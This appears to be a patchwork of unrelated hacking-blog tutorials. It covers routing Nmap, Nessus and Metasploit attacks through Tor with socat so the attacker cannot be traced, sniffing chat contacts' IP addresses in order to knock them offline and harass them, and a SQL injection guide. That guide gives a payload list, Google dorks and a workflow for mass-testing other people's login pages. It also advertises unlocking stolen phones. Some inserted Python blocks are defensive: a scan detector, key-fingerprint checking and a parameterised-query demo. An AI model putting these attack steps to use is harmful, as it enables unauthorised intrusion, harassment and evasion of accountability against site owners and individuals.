
How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also lets developers and researchers build new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that let organizations and individuals share information over public networks without compromising their privacy.
The Onion Router [TOR] is an excellent piece of work in defending online privacy. As with every debate about exploitation frameworks, security tools and vulnerability disclosures, such projects have also been the target of criticism and debates about the potential abuse they may enable, the danger of teaching individuals a potentially illegal craft, and a 'secure' channel for hiding one's online presence. But let's face it, the bad guys already know about it (that is the reason they're bad, eh). Although these channels of misuse and abuse do exist and cannot be ignored, the merits of Tor will always outweigh the harm the black-hat community may cause with it.
Regrettably, in the country I live in, even most of the senior, knowledgeable people I meet, see or get a chance to work with don't have a clue about online privacy or the security of their information.
Privacy is every individual's right, and is as important as any other basic human need. You will seldom want somebody tracking your IP, spyware tracing your network activity, or, the next time you try to experiment with something, a disagreeable little e-mail from an ISP admin saying that you were doing so-and-so. I am in no way TEMPTING you to do something wrong. It's all about your morals and motivation : ) . The small how-to below is a kick-starter for getting started with TOR and experimenting with some stuff securely. Interested? Move on, but don't go about e-mailing me that stuff like this is illegal to post and ought to be removed.

The problem

A basic issue for the privacy-minded is that the recipient of your communication, or anyone else, can see that you sent it by looking at the IP headers, or worse, can trace the whole path. So can authorized intermediaries like ISPs and government organizations, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle) and looking at headers.
But there are also more powerful kinds of packet analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communication patterns of many different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN? duh!!).

The solution:
A distributed, anonymous, secure network

Distributing your web traffic over several places and servers, so that no single point can link you to your destination, reduces the risks of both simple and sophisticated traffic analysis and helps defend your privacy. It's like taking a zig-zag, random, hard-to-follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films : ) ), then periodically erasing your footprints. Instead of taking a direct route from source to destination, data packets on TOR take a random pathway through several servers that cover your tracks, so no observer at any single point can tell where the data came from or where it is going.
TOR incrementally builds a circuit of encrypted connections through servers on the network. The circuit is extended one hop at a time, and each server along the way knows only which server gave it data and which server it is giving data to. No individual server ever knows the complete path that a data packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make sure that no hop can trace these connections as they pass through.
Once a circuit has been established, any kind of data can be exchanged, and because each server sees no more than one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and destination.
Tor only works for TCP streams and can be used by any application with SOCKS support.
To experiment and write this small how-to, I set up a server on the Web that I wanted to scan from my home network using Nmap, Nessus and Metasploit from my BackTrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation through Tor:
A. Installing TOR: detailed instructions can be found on the Tor web site.
B. Download socat. This tool is an excellent multipurpose relay and will let me set up a local TCP listener that tunnels my connections through the Tor SOCKS server (listening on 9050).
Unfortunately socat only comes on BSD and *nix systems. To use TOR on Windows I would recommend using Privoxy, or better, installing the whole TorCP bundle.

Let us assume that the IP address of the host I wanted to scan was 202.163.97.20.
I invoked socat:
[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
The above command causes socat to listen on port 8080 and tunnel all incoming connections to 202.163.97.20 (port 80) through the Tor SOCKS server.
For use on Windows you will need to:
1. Install Privoxy
2. Allow HTTP CONNECT requests on port 80 through your firewall
3. Browse to http://config.privoxy.org/show-status
C. I assume Nmap, Nessus and Metasploit are already installed and running. If not, you can find detailed instructions on the respective web sites.
D. Launch an Nmap connect scan or a Nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the "Scan Options" tab.
Here are some of the entries in my Apache log that resulted from the scan:
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
The 212.9.32.5 IP address is the host that was the last onion router (the exit node) in the random circuit set up by the Tor program.
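Seen from the other side of the wire, those log entries are exactly what a web server admin would want to pick out. The following is an added example, not code from the original post: it parses Apache combined-format lines and flags sources that look like a vulnerability scan, using a few of the Nessus lines quoted above plus one constructed benign request (from the made-up address 10.0.0.7) so the filter has something to leave alone.

```python
import re
from collections import defaultdict

# Apache "combined" log format:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# User-Agent substrings that well-known scanners put in their requests.
SCANNER_MARKERS = ("Nessus", "Nmap", "Nikto")

# Sample log: five of the Nessus lines from the post, plus one constructed
# benign request from 10.0.0.7.
SAMPLE_LOG = """\
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
10.0.0.7 - - [10/Jul/2005:17:30:02 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux)"
"""

def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""
    return rec

def summarize_by_source(text):
    """Count requests, 404s and scanner user-agents per source IP."""
    per_ip = defaultdict(lambda: {"requests": 0, "not_found": 0, "scanners": set()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["requests"] += 1
        if rec["status"] == 404:
            s["not_found"] += 1
        for marker in SCANNER_MARKERS:
            if marker.lower() in rec["agent"].lower():
                s["scanners"].add(marker)
    return dict(per_ip)

def flag_scanners(text, max_404_ratio=0.5, min_requests=3):
    """Return {ip: [reasons]} for sources that look like a vulnerability scan.

    A scanner User-Agent is the obvious tell; a burst of 404s for paths that
    do not exist on the site also catches scanners that spoof a browser UA.
    Remember that 212.9.32.5 in the post is a Tor exit node: the address
    identifies the exit, not the person running the scan, so blocking it
    mostly punishes other Tor users rather than the scanner.
    """
    flagged = {}
    for ip, s in summarize_by_source(text).items():
        reasons = []
        if s["scanners"]:
            reasons.append("scanner user-agent: " + ", ".join(sorted(s["scanners"])))
        if s["requests"] >= min_requests and s["not_found"] / s["requests"] >= max_404_ratio:
            reasons.append("%d of %d requests were 404" % (s["not_found"], s["requests"]))
        if reasons:
            flagged[ip] = reasons
    return flagged

if __name__ == "__main__":
    for ip, reasons in flag_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```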
Similarly, once you discover a vulnerability on a remote system, set up another instance of socat. Say for simplicity you are exploiting a web server (port 80):
[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
In Metasploit, when launching the exploit, set the target IP to 127.0.0.1 and the remote port to 1234. It's that simple, eh.
The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.

Some pieces of advice:
1. Some Nmap scan types generate packets through the raw packet interface, so those packets go directly to the target, not through Tor. For example: a connect() scan (TCP) will work with Tor, but something like -sS connects directly to the target, revealing your true address.
2. Nmap and Nessus will often ping a target to see if it is up before doing a port scan. This is usually done with raw ICMP packets; ICMP won't traverse the Tor network (since it is not TCP) and will reveal your true address.
3. When using socat, SOCKS4 does client-side DNS. So you would resolve a target host name via DNS from your own machine, not through the Tor network proxies.
Hence it is impossible to leak your source IP with the setup above, because you tell your scanner to use 127.0.0.1 as the target IP. Nmap / Nessus then has no host name to resolve, and if you forget to tell your scanner not to bother with ICMP pings, you end up pinging yourself, not the target directly.

Staying anonymous

Tor cannot solve all anonymity issues. It focuses only on protecting the transport of data. You will need to use protocol-specific support software if you don't want the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy, and open relays, while web browsing to block cookies and withhold information about your browser type.
Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast enough for web browsing, Tor does not provide protection against end-to-end timing attacks: if your attacker can watch the traffic coming out of your computer and also the traffic arriving at your chosen destination, they can use statistical analysis to discover that they are part of the same circuit.
The Electronic Privacy Information Center (EPIC) maintains a comprehensive list that serves as a sampling of the best available privacy-enhancing tools.

How To install Tor in backtrack4

So you’ve been checking out BackTrack 4, and you want to get your anonymity on? This is assuming you have either installed BT4 to your hard drive or you’re using the VMWare version. You can do this on a LiveCD too of course, but your changes won’t stay unless you do some fancy lzm voodoo and burn a new copy of your CD.

First, you need to add the noreply.org repositories to your sources.list. These are the official Tor repositories for Debian-based Linux distributions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the gpg key, and check the fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

The fingerprint should look like this:

Code:

pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid [jpeg image of size 7974]
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt-key ring by doing this:

Code:

gpg --export 94C09C7F | sudo apt-key add -
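The fingerprint comparison in the previous step is the part people skip, and it is the only thing standing between you and a key that somebody else uploaded to the keyserver under the same short ID. As an added example (not from the original walkthrough), here is that check done mechanically: it reads the `gpg --fingerprint` output shown above, compares the full 40-hex-digit fingerprint against the value you expect, confirms the short ID is consistent with it, and only then hands back the apt-key command.

```python
import re

# Output of `gpg --fingerprint 94C09C7F` as shown in the post, embedded here
# so the check runs offline (uid lines trimmed; they do not affect the check).
GPG_OUTPUT = """\
pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]
"""

# What you expect, copied from a source you trust (the project's own web
# page, a printed fingerprint, a colleague), NOT from the keyserver itself.
EXPECTED_FINGERPRINT = "5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F"

FPR_RE = re.compile(r"Key fingerprint\s*=\s*([0-9A-Fa-f ]+)")

def normalize(fpr):
    """Strip whitespace and case so 'AB CD' and 'abcd' compare equal."""
    return re.sub(r"\s+", "", fpr).upper()

def extract_fingerprint(gpg_output):
    """Pull the full fingerprint out of `gpg --fingerprint` text."""
    m = FPR_RE.search(gpg_output)
    if not m:
        raise ValueError("no 'Key fingerprint =' line in gpg output")
    fpr = normalize(m.group(1))
    if len(fpr) != 40:  # v4 OpenPGP fingerprints are 160 bits = 40 hex digits
        raise ValueError("unexpected fingerprint length: %d" % len(fpr))
    return fpr

def key_id_from_fingerprint(fpr):
    """The 8-hex-digit short key ID is just the low 32 bits of the fingerprint."""
    return normalize(fpr)[-8:]

def verify_key(gpg_output, expected_fpr, key_id):
    """True only if the fetched key's full fingerprint equals the expected one
    AND the short ID you asked the keyserver for is consistent with it.
    The short ID alone proves nothing: 32 bits is cheap to collide, which is
    why the walkthrough has you compare the whole fingerprint first."""
    fpr = extract_fingerprint(gpg_output)
    return (fpr == normalize(expected_fpr)
            and key_id_from_fingerprint(fpr) == key_id.upper())

def import_command(gpg_output, expected_fpr, key_id):
    """Return the apt-key command from the post, or None if verification failed."""
    if not verify_key(gpg_output, expected_fpr, key_id):
        return None
    return "gpg --export %s | sudo apt-key add -" % key_id

if __name__ == "__main__":
    cmd = import_command(GPG_OUTPUT, EXPECTED_FINGERPRINT, "94C09C7F")
    print(cmd if cmd else "fingerprint mismatch - do NOT import this key")
```

On current Debian and Ubuntu releases apt-key itself is deprecated in favour of a keyring file referenced by `signed-by=` in the sources entry, but the fingerprint check is the part that matters either way.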

Now update your sources, and install tor and privoxy.

Code:

apt-get update
apt-get install tor privoxy

When this is done you’ll need to change a couple of privoxy settings. In a terminal, edit the privoxy config file:

Code:

nano /etc/privoxy/config

Add this line to the top (including the period at the end):

Code:

forward-socks4a / 127.0.0.1:9050 .

Now we need to disable logs. Find the line "logfile logfile" and add a # at the beginning to comment it out (you can search a file in nano with Ctrl-W). You may want to search for the line "jarfile jarfile" and make sure that's commented out too, but it already was for me. Now exit nano and restart the Privoxy service:

Code:

/etc/init.d/privoxy restart

Now head on over to the Torbutton Firefox add-on page, install Torbutton, and restart Firefox.

Now head over to the Tor detection page. It should tell you that you're not using Tor. Click the Tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press Enter in the address bar to reload the page. Note that you can't just hit refresh, because you need to make sure Firefox opens a new socket to check.torproject.org. If all is well, you see the bright green notice "Congratulations. You are using Tor."

How to find the IP addresses from Skype, Yahoo and MSN (Updated)

The program we will be using today is called SmartSniff; the download links are at the bottom. SmartSniff is a network packet analyzer: it monitors all the incoming and outgoing data going through your PCI card or WiFi card. In most cases, if it's not P2P, such as an IM, there will be 2 IPs: one for the server of the instant message provider, and the other IP will be theirs. In cases where you want to pull someone's IP straight from TeamViewer, that would be very easy.

Open up all the programs you need. So I have Xfire, PuTTY and SmartSniff open and ready to go.

After that, log in, or if you're already logged in, select the VIC that you want to pull the IP from, open up a chat, and I'll give an example of what you do.

Example:
You:Hello
Them:Hey
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
All you do is spam, but remember you must click the green Play button on SmartSniff before you do, so that it grabs the data/packets. The picture below will help you understand more.

Once you have their IP, feel free to hit them offline or pull their location and fuck with them all you want.

I suggest, if you're using Skype or AIM, going into a call with them, because the packets will increase rapidly and you will be able to pull their IP really quickly :)

Downloads: Smartsniff Here

How to fix "Partition not found" / GRUB error, or remove Ubuntu

Okay, I know some people are going to have a cow because I'm posting this. But the truth is, there are a lot of people trying Ubuntu alongside Windows 7. People who have attempted to remove Ubuntu without properly deleting all of the Ubuntu partitions are left with this GRUB error. My friend recently faced this and asked for my help to fix it. It is a common problem faced by many, so I am posting a solution on how to fix it.

So... for all of you who have a dual-boot system and are looking to remove Ubuntu for now, here are some tips. NEVER NEVER NEVER just remove the Ubuntu partitions: you won't be able to boot Windows, because the information pointed to by your master boot record will be gone. Instead, follow these easy steps:

(1) Boot your Windows installation
(2) Click on this link Get Mbrfix
(3) Download the program, unzip it and copy it to your root folder (I'll assume c:\)
(4) Open up the command prompt in Windows by going to start/accessories/command prompt
(5) Type:
cd \ and press "Enter"
mbrfix /drive 0 fixmbr /yes and press "Enter"

*PLEASE NOTE* The above assumes your boot device is device 0 - if you are not sure on this please post for help.

(6) Close the command prompt window


*PLEASE NOTE* The following assumes you want to get rid of your Ubuntu partitions and resize your Windows partition(s) to take up that space. If you do not wish to do so, you can stop now.

(7) Put your Ubuntu LiveCD back in the CD drive and reboot your PC so that the Ubuntu desktop comes up
(8) On the Ubuntu desktop, look at the top menu bar and go to applications/accessories/terminal
(9) When the terminal window comes up, type:
sudo gparted and press "Enter"

This brings up the disk manager. You want to:

(a) delete all non-Windows partitions
(b) resize your Windows partition to be larger (optional - you may want to leave this alone so you can come back and try Ubuntu again!)

(10) When you have finished deleting the Ubuntu partitions, just restart your PC, removing the CD from the drive before it boots again.

If everything went correctly, your PC should just automatically boot Windows. Note that on the first boot of Windows after you have changed the disk (especially if you resized the Windows partition), Windows may run a chkdsk - this is normal and should be ok.

If you have already deleted your Linux partitions and are getting GRUB errors, please try this as suggested by this user (thanks for the neat addition!!)

Bothered
A Carafe of Ubuntu
Join Date: Jun 2007
Location: United Kingdom
Beans: 136
Ubuntu 7.04 Feisty Fawn User
Windows User


Re: HowTo: Remove Ubuntu (& Restore Windows)

--------------------------------------------------------------------------------

If you delete the ubuntu partitions without running mbrfix then you can use the ubuntu LiveCD to restore the master boot record by:

1. Booting from the ubuntu LiveCD
2. Enabling universe repositories - launch System->Administration->Software Sources and check the "Community maintained Open Source software (universe)"
3. Installing the "ms-sys" package - click Applications->Accessories->Terminal and type "sudo apt-get update" and then "sudo apt-get install ms-sys".
4. Finally restore the Windows master boot record by entering the command "ms-sys -w /dev/[drive]", where [drive] is the hard disk whose Windows master boot record you want to restore. You can find out which this is by launching gparted (System->Administration->GNOME Partition Editor) and cycling through the available drives until you find your Windows partition

- - - - -

Hope this helps, and please let me know if anyone finds any errors. Also, for anyone using this post, "we" really hope you will come back to Ubuntu someday! Linux, and Ubuntu, will be waiting!

============================

Troubleshooting:

If, after following this guide, you can not boot to Windows you may need to boot a live CD and manually delete the Ubuntu partition (making it unpartitioned space, adding it to the Windows partition, or formatting it to FAT/NTFS). Additionally you need to be sure the MBR is set for Windows. You will need to search the forums for more help on that. In addition, the following Microsoft articles may be of help:

How To Factory Unlock Your iPhone Right from your Home

Break The Lock: recently I came across a website where you can factory unlock any iPhone permanently, right from your home. I factory unlocked my iPhone 5, locked to AT&T, in just 6 hours.


Why unlock your iPhone, and what difference will it make?

  • After unlocking you can use your iPhone with any GSM carrier in the world, meaning you can shift to any carrier that best suits your needs.
  • Unlike software or hardware unlocks, this won't void your warranty.
  • It's safe and fast: you just need to order the unlock and restore your iPhone from iTunes to get it unlocked, as simple as that.
  • You can increase the resale value of your iPhone.
  • You can even unlock blacklisted, stolen or insurance-claimed phones; they will work normally, like a factory-unlocked phone, after unlocking.

What models are supported?

The big thing is you can unlock almost all iPhone models from 40 countries and 500 different carriers around the world. Breakthelock.com supports all basebands and firmware versions.

Unlike software unlocks or jailbreaks, this is a permanent solution: you just need to unlock it once and your iPhone will stay unlocked forever. You can update iOS, sync with iTunes and change SIM cards whenever you like without the fear of it ever re-locking again. Unlock your iPhone now.

What is SQL Injection and How to do It

One of the major problems with SQL is the poor security surrounding login and URL strings.
This tutorial is not going to go into detail on why these strings work, as I am not a coder; I just know what I know, and it works.

SEARCH:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from... finding one that's vulnerable is another question.


WHAT I DO :

First let me go into details on how I go about my research.

I have gathered plenty of injection strings over quite some time, like those below, and have just been granted access to a test machine and will be testing for many variations and new inputs... legally, cool... provided by my good friend Gsecur aka ICE, also an Astal member, http://governmentsecurity.org "thanks mate". It gives me a chance to concentrate on what I am doing and not be looking over my shoulder.

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

In fact I have compiled a combo list with strings like this to use on my chosen targets... there are plenty of strings about; the list below is a sample of the most commonly used.

There are many other strings involving, for instance, UNION table access via reading the table structure from error pages;
thus an attack with this method will eventually reveal admin U\P paths... but that's another paper.

The ones I am interested in are quick access to targets.

PROGRAM

I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit
of success with a combo list formatted this way; yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes.
How long would it take to go through 40 sites cutting and pasting each string??

combo example:

admin:' or a=a--
admin:' or 1=1--

And so on... it doesn't have to be admin, it can be anything you want... the most important part is, for example: ' or 1=1-- this is our injection string.
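Since the post says it won't explain why the string works, here is the short version as an added example (not the poster's code, and using a constructed SQLite table rather than any real login.asp): the vulnerable login builds its query by gluing the form fields into the SQL text, so `' or 1=1--` closes the string, makes the WHERE clause true for every row and comments out the rest; the second function runs the same query with bound parameters, and the very same input is then just a password that doesn't match.

```python
import sqlite3

def make_db():
    """Constructed users table with one account. Plaintext password only to
    keep the demo short; a real application stores a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn

def vulnerable_login(conn, username, password):
    """The classic login.asp bug: query built by string concatenation.
    With password = ' or 1=1--  the SQL becomes
      ... WHERE username = 'admin' AND password = '' or 1=1--'
    The quote closes the string literal, 'or 1=1' makes the WHERE true for
    every row, and '--' comments out the trailing quote, so a row comes back
    and the caller treats that as a successful login."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row is not None

def safe_login(conn, username, password):
    """Same query with bound parameters. The driver sends the values
    separately from the SQL text, so ' or 1=1-- is compared literally
    against the stored password and is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None

def compare(conn, username, password):
    """Run one credential pair through both implementations."""
    return {"vulnerable": vulnerable_login(conn, username, password),
            "safe": safe_login(conn, username, password)}

if __name__ == "__main__":
    db = make_db()
    print(compare(db, "admin", "s3cret"))       # both True: the real password
    print(compare(db, "admin", "' or 1=1--"))   # vulnerable True, safe False
    print(compare(db, "admin", "' or 'x'='x"))  # vulnerable True, safe False
    print(compare(db, "admin'--", "anything"))  # username-field variant
```

The strings ending in `#` from the list further down are MySQL comment syntax and would be a syntax error in SQLite, which is itself a reminder that which payload "works" depends on the database behind the form, while the parameterised version is immune to all of them.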

Now the only trudge is finding targets to exploit... so I tend to search, say, Google for login.asp or whatever:

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets; trying various searches spews out plenty more.


Now, using proxies set in my browser, I then click through interesting targets... seeing what's what on the site pages. If interesting,
I then cut and paste the URL as a possible target... after an hour or so you have a list of potential target sites like so:

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

And so on... in a couple of hours you can build up quite a list. The reason I don't select all results or spider for login pages is
I want to keep the noise level low... my ISP... well, enough said... plus at the moment I am on dial-up, so too slow for me.

I then save the list, fire up Ares and enter (1) a proxy list, (2) my target IP list, (3) my combo list... start. Now I don't want to go into
problems with users using Ares... thing is, I know it works for me...

Sit back and wait... any vulnerable target will show up in the hits box. Now when it finds a target it will report all the strings on that site as vulnerable... you have to go through each one on the site by cutting and pasting the string till you find the right one... but the thing is, you know you CAN access the site... really I need a program that will return the hit with a click on the URL and ignore false outputs.

I am still looking... thing is, it would save quite a bit of time going to each site and each string to find it's not exploitable.

There you go, you should have access to your vulnerable target by now.

Another thing: you can use the strings in URLs where user=? appears. Edit the URL up to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- which is just as quick as the login process.


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hacking

Wordpress Hack : Find all the plugins being used on a WP blog

Plugins enhance the functionality of WordPress. Plugins are very important for any blogger who wishes to make his/her blog a success. It's for the same reason that no blogger would like to reveal which plugins he/she uses.

Here's a simple WordPress hack through which you can find ALL the plugins being used on a WordPress blog. It won't work on all of them, but will work for most.


  1. Identify your victim. Let’s say http://www.example.com


  2. In the address bar type the following : http://www.example.com/wp-content/plugins


You should get the list of plugins being used, as a directory listing!

The fix for this is to disable directory listing in the hosting control panel, or to add the following line to the .htaccess file:

Options -Indexes

With that in place the server returns a 403 error to anyone requesting the directory, while the plugin files themselves remain reachable by their normal paths.